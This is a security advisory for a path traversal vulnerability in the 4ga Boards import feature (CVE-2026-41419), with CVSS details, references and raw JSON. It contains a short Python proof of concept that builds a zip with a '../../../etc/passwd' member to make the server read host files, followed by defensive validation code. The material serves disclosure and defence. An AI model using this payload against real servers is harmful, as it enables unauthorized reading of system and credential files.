Security Vulnerability Report
CVE-2026-41419 CVSS 7.6 HIGH


Published: 2026-04-24 19:17:14
Last Modified: 2026-04-27 19:10:46

Description

4ga Boards is a boards system for realtime project management. Prior to 3.3.5, a path traversal vulnerability allows an authenticated user with board import privileges to make the server ingest arbitrary host files as board attachments during BOARDS archive import. Once imported, the file can be downloaded through the normal application interface, resulting in unauthorized local file disclosure. This vulnerability is fixed in 3.3.5.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

4ga Boards < 3.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile
import os

# Create a malicious zip file to demonstrate the path traversal
# The file inside the zip will have a name pointing to a sensitive file on the server (e.g., /etc/passwd)
filename = "malicious_boards_export.zip"
with zipfile.ZipFile(filename, 'w') as zf:
    # ZipInfo object for the file with path traversal
    # This attempts to read /etc/passwd on the server when imported
    zinfo = zipfile.ZipInfo("../../../etc/passwd")
    zinfo.compress_type = zipfile.ZIP_DEFLATED
    # Add dummy content, as the server reads the file from the disk, not this content
    zf.writestr(zinfo, "This content is ignored, server reads the target file.")
print(f"[+] PoC file generated: {filename}")
print("[+] Upload this file to the 4ga Boards import function to trigger the vulnerability.")
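The defensive counterpart to the description and PoC above, added here as an example and not code from 4ga Boards or the advisory: an import routine that validates every archive member name before touching the filesystem and always takes attachment bytes from the archive itself, never from a host path derived from the member name. The function names, the rejection rules and the constructed demo archive are assumptions, not the project's actual fix.

```python
import os
import tempfile
import zipfile
from pathlib import PurePosixPath

def safe_member_path(member_name: str, import_root: str) -> str:
    """Map an archive member name to a path inside import_root, or raise
    ValueError if it would escape (the CWE-22 check the import needs)."""
    # Syntactic rejects: empty, absolute, backslashes, drive letters, '.'/'..'
    if not member_name or member_name.startswith("/") or "\\" in member_name:
        raise ValueError(f"rejected member name: {member_name!r}")
    if any(p in (".", "..") or ":" in p for p in PurePosixPath(member_name).parts):
        raise ValueError(f"rejected member name: {member_name!r}")
    root = os.path.realpath(import_root)  # containment re-check on resolved path
    target = os.path.realpath(os.path.join(root, member_name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"member escapes import root: {member_name!r}")
    return target

def import_attachments(archive_path: str, import_root: str):
    """Write attachments under import_root, taking bytes from the archive
    (zf.read), never from a host path built from the member name.
    Returns (accepted: name -> bytes written, rejected: [names])."""
    accepted, rejected = {}, []
    with zipfile.ZipFile(archive_path) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            try:
                dest = safe_member_path(info.filename, import_root)
            except ValueError:
                rejected.append(info.filename)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            data = zf.read(info)
            with open(dest, "wb") as dst:
                dst.write(data)
            accepted[info.filename] = data
    return accepted, rejected

def demo():
    """Constructed archive: one benign attachment, the PoC's traversal name,
    and a nested variant that does not start with '..'."""
    with tempfile.TemporaryDirectory() as tmp:
        archive = os.path.join(tmp, "export.zip")
        with zipfile.ZipFile(archive, "w") as zf:
            zf.writestr("attachments/notes.txt", "hello")
            zf.writestr("../../../etc/passwd", "ignored")
            zf.writestr("attachments/sub/../../../x", "ignored")
        return import_attachments(archive, os.path.join(tmp, "import"))
```

Rejected names are a useful detection signal: logging them with the importing user's identity turns an attempted traversal into an auditable event rather than a silent file disclosure.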

References

GitHub Security Advisory: https://github.com/RARgames/4gaBoards/security/advisories/GHSA-rrjq-7x8g-cmgm
Weakness: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, 'Path Traversal')
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-41419",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-24T19:17:13.603",
    "lastModified": "2026-04-27T19:10:45.587",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "4ga Boards is a boards system for realtime project management. Prior to 3.3.5, a path traversal vulnerability allows an authenticated user with board import privileges to make the server ingest arbitrary host files as board attachments during BOARDS archive import. Once imported, the file can be downloaded through the normal application interface, resulting in unauthorized local file disclosure. This vulnerability is fixed in 3.3.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/RARgames/4gaBoards/security/advisories/GHSA-rrjq-7x8g-cmgm",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/RARgames/4gaBoards/security/advisories/GHSA-rrjq-7x8g-cmgm",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}